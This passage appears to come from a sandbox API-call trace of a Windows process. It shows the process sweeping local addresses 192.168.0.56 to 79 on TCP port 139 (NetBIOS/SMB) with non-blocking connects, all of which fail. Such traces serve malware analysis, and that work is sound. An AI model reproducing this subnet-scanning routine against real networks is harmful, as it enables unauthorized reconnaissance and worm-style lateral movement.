wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0176.214] socket (af=2, type=1, protocol=6) returned 0x544 [0176.214] inet_addr (cp="192.168.0.56") returned 0x3800a8c0 [0176.214] htons (hostshort=0x8b) returned 0x8b00 [0176.214] ioctlsocket (in: s=0x544, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0176.214] connect (s=0x544, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.56"), namelen=16) returned -1 [0176.215] ioctlsocket (in: s=0x544, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0176.215] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0177.227] __WSAFDIsSet (param_1=0x544, param_2=0x346f960) returned 0 [0177.227] GetLastError () returned 0x0 [0177.227] SetLastError (dwErrCode=0x0) [0177.227] GetLastError () returned 0x0 [0177.227] SetLastError (dwErrCode=0x0) [0177.227] htonl (hostlong=0xc0a80039) returned 0x3900a8c0 [0177.227] inet_ntoa (in=0x3900a8c0) returned="192.168.0.57" [0177.227] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0177.227] socket (af=2, type=1, protocol=6) returned 0x548 [0177.227] inet_addr (cp="192.168.0.57") returned 0x3900a8c0 [0177.227] htons (hostshort=0x8b) returned 0x8b00 [0177.227] ioctlsocket (in: s=0x548, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0177.227] connect (s=0x548, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.57"), namelen=16) returned -1 [0177.228] ioctlsocket (in: s=0x548, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0177.228] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0178.242] __WSAFDIsSet (param_1=0x548, param_2=0x346f960) returned 0 [0178.242] GetLastError () returned 0x0 [0178.242] SetLastError (dwErrCode=0x0) [0178.242] GetLastError () returned 0x0 [0178.242] SetLastError (dwErrCode=0x0) [0178.242] htonl (hostlong=0xc0a8003a) returned 0x3a00a8c0 [0178.242] inet_ntoa (in=0x3a00a8c0) returned="192.168.0.58" [0178.242] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0178.242] socket (af=2, type=1, protocol=6) returned 0x550 [0178.242] inet_addr (cp="192.168.0.58") returned 0x3a00a8c0 [0178.242] htons (hostshort=0x8b) returned 0x8b00 [0178.242] ioctlsocket (in: s=0x550, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0178.242] connect (s=0x550, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.58"), namelen=16) returned -1 [0178.242] ioctlsocket (in: s=0x550, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0178.242] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0179.255] __WSAFDIsSet (param_1=0x550, param_2=0x346f960) returned 0 [0179.255] GetLastError () returned 0x0 [0179.255] SetLastError (dwErrCode=0x0) [0179.255] GetLastError () returned 0x0 [0179.255] SetLastError (dwErrCode=0x0) [0179.255] htonl (hostlong=0xc0a8003b) returned 0x3b00a8c0 [0179.255] inet_ntoa (in=0x3b00a8c0) returned="192.168.0.59" [0179.255] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0179.255] socket (af=2, type=1, protocol=6) returned 0x554 [0179.255] inet_addr (cp="192.168.0.59") returned 0x3b00a8c0 [0179.255] htons (hostshort=0x8b) returned 0x8b00 [0179.255] ioctlsocket (in: s=0x554, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0179.255] connect (s=0x554, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.59"), namelen=16) returned -1 [0179.256] ioctlsocket (in: s=0x554, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0179.256] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0180.270] __WSAFDIsSet (param_1=0x554, param_2=0x346f960) returned 0 [0180.270] GetLastError () returned 0x0 [0180.270] SetLastError (dwErrCode=0x0) [0180.270] GetLastError () returned 0x0 [0180.270] SetLastError (dwErrCode=0x0) [0180.270] htonl (hostlong=0xc0a8003c) returned 0x3c00a8c0 [0180.270] inet_ntoa (in=0x3c00a8c0) returned="192.168.0.60" [0180.270] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0180.270] socket (af=2, type=1, protocol=6) returned 0x560 [0180.271] inet_addr (cp="192.168.0.60") returned 0x3c00a8c0 [0180.271] htons (hostshort=0x8b) returned 0x8b00 [0180.271] ioctlsocket (in: s=0x560, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0180.271] connect (s=0x560, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.60"), namelen=16) returned -1 [0180.271] ioctlsocket (in: s=0x560, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0180.271] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0181.407] __WSAFDIsSet (param_1=0x560, param_2=0x346f960) returned 0 [0181.408] GetLastError () returned 0x0 [0181.408] SetLastError (dwErrCode=0x0) [0181.408] GetLastError () returned 0x0 [0181.408] SetLastError (dwErrCode=0x0) [0181.409] htonl (hostlong=0xc0a8003d) returned 0x3d00a8c0 [0181.409] inet_ntoa (in=0x3d00a8c0) returned="192.168.0.61" [0181.409] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0181.409] socket (af=2, type=1, protocol=6) returned 0x564 [0181.409] inet_addr (cp="192.168.0.61") returned 0x3d00a8c0 [0181.409] htons (hostshort=0x8b) returned 0x8b00 [0181.409] ioctlsocket (in: s=0x564, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0181.409] connect (s=0x564, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.61"), namelen=16) returned -1 [0181.409] ioctlsocket (in: s=0x564, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0181.409] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0182.423] __WSAFDIsSet (param_1=0x564, param_2=0x346f960) returned 0 [0182.423] GetLastError () returned 0x0 [0182.423] SetLastError (dwErrCode=0x0) [0182.423] GetLastError () returned 0x0 [0182.423] SetLastError (dwErrCode=0x0) [0182.423] htonl (hostlong=0xc0a8003e) returned 0x3e00a8c0 [0182.423] inet_ntoa (in=0x3e00a8c0) returned="192.168.0.62" [0182.423] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0182.423] socket (af=2, type=1, protocol=6) returned 0x570 [0182.423] inet_addr (cp="192.168.0.62") returned 0x3e00a8c0 [0182.423] htons (hostshort=0x8b) returned 0x8b00 [0182.423] ioctlsocket (in: s=0x570, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0182.423] connect (s=0x570, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.62"), namelen=16) returned -1 [0182.423] ioctlsocket (in: s=0x570, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0182.424] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0183.435] __WSAFDIsSet (param_1=0x570, param_2=0x346f960) returned 0 [0183.435] GetLastError () returned 0x0 [0183.435] SetLastError (dwErrCode=0x0) [0183.435] GetLastError () returned 0x0 [0183.435] SetLastError (dwErrCode=0x0) [0183.435] htonl (hostlong=0xc0a8003f) returned 0x3f00a8c0 [0183.435] inet_ntoa (in=0x3f00a8c0) returned="192.168.0.63" [0183.435] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0183.435] socket (af=2, type=1, protocol=6) returned 0x574 [0183.436] inet_addr (cp="192.168.0.63") returned 0x3f00a8c0 [0183.436] htons (hostshort=0x8b) returned 0x8b00 [0183.436] ioctlsocket (in: s=0x574, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0183.436] connect (s=0x574, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.63"), namelen=16) returned -1 [0183.436] ioctlsocket (in: s=0x574, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0183.436] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0184.451] __WSAFDIsSet (param_1=0x574, param_2=0x346f960) returned 0 [0184.451] GetLastError () returned 0x0 [0184.451] SetLastError (dwErrCode=0x0) [0184.451] GetLastError () returned 0x0 [0184.451] SetLastError (dwErrCode=0x0) [0184.451] htonl (hostlong=0xc0a80040) returned 0x4000a8c0 [0184.451] inet_ntoa (in=0x4000a8c0) returned="192.168.0.64" [0184.451] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0184.451] socket (af=2, type=1, protocol=6) returned 0x580 [0184.451] inet_addr (cp="192.168.0.64") returned 0x4000a8c0 [0184.451] htons (hostshort=0x8b) returned 0x8b00 [0184.451] ioctlsocket (in: s=0x580, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0184.451] connect (s=0x580, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.64"), namelen=16) returned -1 [0184.451] ioctlsocket (in: s=0x580, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0184.452] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0185.463] __WSAFDIsSet (param_1=0x580, param_2=0x346f960) returned 0 [0185.463] GetLastError () returned 0x0 [0185.463] SetLastError (dwErrCode=0x0) [0185.463] GetLastError () returned 0x0 [0185.464] SetLastError (dwErrCode=0x0) [0185.464] htonl (hostlong=0xc0a80041) returned 0x4100a8c0 [0185.464] inet_ntoa (in=0x4100a8c0) returned="192.168.0.65" [0185.464] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0185.464] socket (af=2, type=1, protocol=6) returned 0x33c [0185.464] inet_addr (cp="192.168.0.65") returned 0x4100a8c0 [0185.464] htons (hostshort=0x8b) returned 0x8b00 [0185.464] ioctlsocket (in: s=0x33c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0185.464] connect (s=0x33c, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.65"), namelen=16) returned -1 [0185.465] ioctlsocket (in: s=0x33c, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0185.465] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0186.478] __WSAFDIsSet (param_1=0x33c, param_2=0x346f960) returned 0 [0186.479] GetLastError () returned 0x0 [0186.479] SetLastError (dwErrCode=0x0) [0186.479] GetLastError () returned 0x0 [0186.479] SetLastError (dwErrCode=0x0) [0186.479] htonl (hostlong=0xc0a80042) returned 0x4200a8c0 [0186.479] inet_ntoa (in=0x4200a8c0) returned="192.168.0.66" [0186.479] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0186.479] socket (af=2, type=1, protocol=6) returned 0x594 [0186.479] inet_addr (cp="192.168.0.66") returned 0x4200a8c0 [0186.479] htons (hostshort=0x8b) returned 0x8b00 [0186.479] ioctlsocket (in: s=0x594, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0186.479] connect (s=0x594, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.66"), namelen=16) returned -1 [0186.479] ioctlsocket (in: s=0x594, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0186.479] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0187.491] __WSAFDIsSet (param_1=0x594, param_2=0x346f960) returned 0 [0187.491] GetLastError () returned 0x0 [0187.491] SetLastError (dwErrCode=0x0) [0187.491] GetLastError () returned 0x0 [0187.491] SetLastError (dwErrCode=0x0) [0187.491] htonl (hostlong=0xc0a80043) returned 0x4300a8c0 [0187.491] inet_ntoa (in=0x4300a8c0) returned="192.168.0.67" [0187.492] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0187.492] socket (af=2, type=1, protocol=6) returned 0x4ac [0187.492] inet_addr (cp="192.168.0.67") returned 0x4300a8c0 [0187.492] htons (hostshort=0x8b) returned 0x8b00 [0187.492] ioctlsocket (in: s=0x4ac, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0187.492] connect (s=0x4ac, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.67"), namelen=16) returned -1 [0187.492] ioctlsocket (in: s=0x4ac, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0187.493] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0188.506] __WSAFDIsSet (param_1=0x4ac, param_2=0x346f960) returned 0 [0188.506] GetLastError () returned 0x0 [0188.506] SetLastError (dwErrCode=0x0) [0188.506] GetLastError () returned 0x0 [0188.506] SetLastError (dwErrCode=0x0) [0188.506] htonl (hostlong=0xc0a80044) returned 0x4400a8c0 [0188.507] inet_ntoa (in=0x4400a8c0) returned="192.168.0.68" [0188.507] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0188.507] socket (af=2, type=1, protocol=6) returned 0x5a4 [0188.507] inet_addr (cp="192.168.0.68") returned 0x4400a8c0 [0188.507] htons (hostshort=0x8b) returned 0x8b00 [0188.507] ioctlsocket (in: s=0x5a4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0188.507] connect (s=0x5a4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.68"), namelen=16) returned -1 [0188.507] ioctlsocket (in: s=0x5a4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0188.507] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0189.660] __WSAFDIsSet (param_1=0x5a4, param_2=0x346f960) returned 0 [0189.660] GetLastError () returned 0x0 [0189.660] SetLastError (dwErrCode=0x0) [0189.660] GetLastError () returned 0x0 [0189.660] SetLastError (dwErrCode=0x0) [0189.660] htonl (hostlong=0xc0a80045) returned 0x4500a8c0 [0189.660] inet_ntoa (in=0x4500a8c0) returned="192.168.0.69" [0189.660] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0189.660] socket (af=2, type=1, protocol=6) returned 0x5a0 [0189.660] inet_addr (cp="192.168.0.69") returned 0x4500a8c0 [0189.660] htons (hostshort=0x8b) returned 0x8b00 [0189.660] ioctlsocket (in: s=0x5a0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0189.660] connect (s=0x5a0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.69"), namelen=16) returned -1 [0189.660] ioctlsocket (in: s=0x5a0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0189.661] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0191.704] __WSAFDIsSet (param_1=0x5a0, param_2=0x346f960) returned 0 [0191.704] GetLastError () returned 0x0 [0191.705] SetLastError (dwErrCode=0x0) [0191.705] GetLastError () returned 0x0 [0191.705] SetLastError (dwErrCode=0x0) [0191.705] htonl (hostlong=0xc0a80046) returned 0x4600a8c0 [0191.705] inet_ntoa (in=0x4600a8c0) returned="192.168.0.70" [0191.705] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0191.705] socket (af=2, type=1, protocol=6) returned 0x598 [0191.705] inet_addr (cp="192.168.0.70") returned 0x4600a8c0 [0191.705] htons (hostshort=0x8b) returned 0x8b00 [0191.705] ioctlsocket (in: s=0x598, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0191.705] connect (s=0x598, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.70"), namelen=16) returned -1 [0191.705] ioctlsocket (in: s=0x598, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0191.705] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0192.717] __WSAFDIsSet (param_1=0x598, param_2=0x346f960) returned 0 [0192.717] GetLastError () returned 0x0 [0192.717] SetLastError (dwErrCode=0x0) [0192.717] GetLastError () returned 0x0 [0192.717] SetLastError (dwErrCode=0x0) [0192.717] htonl (hostlong=0xc0a80047) returned 0x4700a8c0 [0192.717] inet_ntoa (in=0x4700a8c0) returned="192.168.0.71" [0192.717] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0192.717] socket (af=2, type=1, protocol=6) returned 0x5b4 [0192.718] inet_addr (cp="192.168.0.71") returned 0x4700a8c0 [0192.718] htons (hostshort=0x8b) returned 0x8b00 [0192.718] ioctlsocket (in: s=0x5b4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0192.718] connect (s=0x5b4, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.71"), namelen=16) returned -1 [0192.718] ioctlsocket (in: s=0x5b4, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0192.718] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0193.732] __WSAFDIsSet (param_1=0x5b4, param_2=0x346f960) returned 0 [0193.732] GetLastError () returned 0x0 [0193.732] SetLastError (dwErrCode=0x0) [0193.732] GetLastError () returned 0x0 [0193.732] SetLastError (dwErrCode=0x0) [0193.732] htonl (hostlong=0xc0a80048) returned 0x4800a8c0 [0193.732] inet_ntoa (in=0x4800a8c0) returned="192.168.0.72" [0193.732] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0193.732] socket (af=2, type=1, protocol=6) returned 0x5c8 [0193.733] inet_addr (cp="192.168.0.72") returned 0x4800a8c0 [0193.733] htons (hostshort=0x8b) returned 0x8b00 [0193.733] ioctlsocket (in: s=0x5c8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0193.733] connect (s=0x5c8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.72"), namelen=16) returned -1 [0193.733] ioctlsocket (in: s=0x5c8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0193.733] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0194.745] __WSAFDIsSet (param_1=0x5c8, param_2=0x346f960) returned 0 [0194.745] GetLastError () returned 0x0 [0194.745] SetLastError (dwErrCode=0x0) [0194.745] GetLastError () returned 0x0 [0194.745] SetLastError (dwErrCode=0x0) [0194.745] htonl (hostlong=0xc0a80049) returned 0x4900a8c0 [0194.745] inet_ntoa (in=0x4900a8c0) returned="192.168.0.73" [0194.745] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0194.745] socket (af=2, type=1, protocol=6) returned 0x5cc [0194.745] inet_addr (cp="192.168.0.73") returned 0x4900a8c0 [0194.745] htons (hostshort=0x8b) returned 0x8b00 [0194.746] ioctlsocket (in: s=0x5cc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0194.746] connect (s=0x5cc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.73"), namelen=16) returned -1 [0194.746] ioctlsocket (in: s=0x5cc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0194.746] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0195.760] __WSAFDIsSet (param_1=0x5cc, param_2=0x346f960) returned 0 [0195.760] GetLastError () returned 0x0 [0195.760] SetLastError (dwErrCode=0x0) [0195.760] GetLastError () returned 0x0 [0195.760] SetLastError (dwErrCode=0x0) [0195.760] htonl (hostlong=0xc0a8004a) returned 0x4a00a8c0 [0195.760] inet_ntoa (in=0x4a00a8c0) returned="192.168.0.74" [0195.760] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0195.760] socket (af=2, type=1, protocol=6) returned 0x5bc [0195.761] inet_addr (cp="192.168.0.74") returned 0x4a00a8c0 [0195.761] htons (hostshort=0x8b) returned 0x8b00 [0195.761] ioctlsocket (in: s=0x5bc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0195.761] connect (s=0x5bc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.74"), namelen=16) returned -1 [0195.761] ioctlsocket (in: s=0x5bc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0195.761] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0196.773] __WSAFDIsSet (param_1=0x5bc, param_2=0x346f960) returned 0 [0196.773] GetLastError () returned 0x0 [0196.773] SetLastError (dwErrCode=0x0) [0196.773] GetLastError () returned 0x0 [0196.773] SetLastError (dwErrCode=0x0) [0196.773] htonl (hostlong=0xc0a8004b) returned 0x4b00a8c0 [0196.773] inet_ntoa (in=0x4b00a8c0) returned="192.168.0.75" [0196.773] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0196.773] socket (af=2, type=1, protocol=6) returned 0x5b0 [0196.774] inet_addr (cp="192.168.0.75") returned 0x4b00a8c0 [0196.774] htons (hostshort=0x8b) returned 0x8b00 [0196.774] ioctlsocket (in: s=0x5b0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0196.774] connect (s=0x5b0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.75"), namelen=16) returned -1 [0196.774] ioctlsocket (in: s=0x5b0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0196.774] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0197.792] __WSAFDIsSet (param_1=0x5b0, param_2=0x346f960) returned 0 [0197.792] GetLastError () returned 0x0 [0197.792] SetLastError (dwErrCode=0x0) [0197.792] GetLastError () returned 0x0 [0197.792] SetLastError (dwErrCode=0x0) [0197.792] htonl (hostlong=0xc0a8004c) returned 0x4c00a8c0 [0197.792] inet_ntoa (in=0x4c00a8c0) returned="192.168.0.76" [0197.792] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0197.792] socket (af=2, type=1, protocol=6) returned 0x5e8 [0197.792] inet_addr (cp="192.168.0.76") returned 0x4c00a8c0 [0197.792] htons (hostshort=0x8b) returned 0x8b00 [0197.792] ioctlsocket (in: s=0x5e8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0197.792] connect (s=0x5e8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.76"), namelen=16) returned -1 [0197.792] ioctlsocket (in: s=0x5e8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0197.793] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0198.801] __WSAFDIsSet (param_1=0x5e8, param_2=0x346f960) returned 0 [0198.801] GetLastError () returned 0x0 [0198.801] SetLastError (dwErrCode=0x0) [0198.801] GetLastError () returned 0x0 [0198.801] SetLastError (dwErrCode=0x0) [0198.801] htonl (hostlong=0xc0a8004d) returned 0x4d00a8c0 [0198.801] inet_ntoa (in=0x4d00a8c0) returned="192.168.0.77" [0198.801] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0198.801] socket (af=2, type=1, protocol=6) returned 0x5dc [0198.802] inet_addr (cp="192.168.0.77") returned 0x4d00a8c0 [0198.802] htons (hostshort=0x8b) returned 0x8b00 [0198.802] ioctlsocket (in: s=0x5dc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0198.802] connect (s=0x5dc, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.77"), namelen=16) returned -1 [0198.802] ioctlsocket (in: s=0x5dc, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0198.802] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0199.823] __WSAFDIsSet (param_1=0x5dc, param_2=0x346f960) returned 0 [0199.823] GetLastError () returned 0x0 [0199.823] SetLastError (dwErrCode=0x0) [0199.823] GetLastError () returned 0x0 [0199.823] SetLastError (dwErrCode=0x0) [0199.823] htonl (hostlong=0xc0a8004e) returned 0x4e00a8c0 [0199.823] inet_ntoa (in=0x4e00a8c0) returned="192.168.0.78" [0199.823] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0199.823] socket (af=2, type=1, protocol=6) returned 0x5f8 [0199.823] inet_addr (cp="192.168.0.78") returned 0x4e00a8c0 [0199.823] htons (hostshort=0x8b) returned 0x8b00 [0199.823] ioctlsocket (in: s=0x5f8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0199.823] connect (s=0x5f8, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.78"), namelen=16) returned -1 [0199.823] ioctlsocket (in: s=0x5f8, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0199.823] select (in: nfds=0, readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68, timeout=0x346f948 | out: readfds=0x0, writefds=0x346f960, exceptfds=0x346fa68) returned 0 [0200.829] __WSAFDIsSet (param_1=0x5f8, param_2=0x346f960) returned 0 [0200.829] GetLastError () returned 0x0 [0200.829] SetLastError (dwErrCode=0x0) [0200.829] GetLastError () returned 0x0 [0200.829] SetLastError (dwErrCode=0x0) [0200.829] htonl (hostlong=0xc0a8004f) returned 0x4f00a8c0 [0200.829] inet_ntoa (in=0x4f00a8c0) returned="192.168.0.79" [0200.829] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x346fb70 | out: lpWSAData=0x346fb70) returned 0 [0200.829] socket (af=2, type=1, protocol=6) returned 0x5f0 [0200.830] inet_addr (cp="192.168.0.79") returned 0x4f00a8c0 [0200.830] htons (hostshort=0x8b) returned 0x8b00 [0200.830] ioctlsocket (in: s=0x5f0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0200.830] connect (s=0x5f0, name=0x346f950*(sa_family=2, sin_port=0x8b, sin_addr="192.168.0.79"), namelen=16) returned -1 [0200.836] ioctlsocket (in: s=0x5f0, cmd=-2147195266, argp=0x346f944 | out: argp=0x346f944) returned 0 [0200.836] select (in: nfds=0, 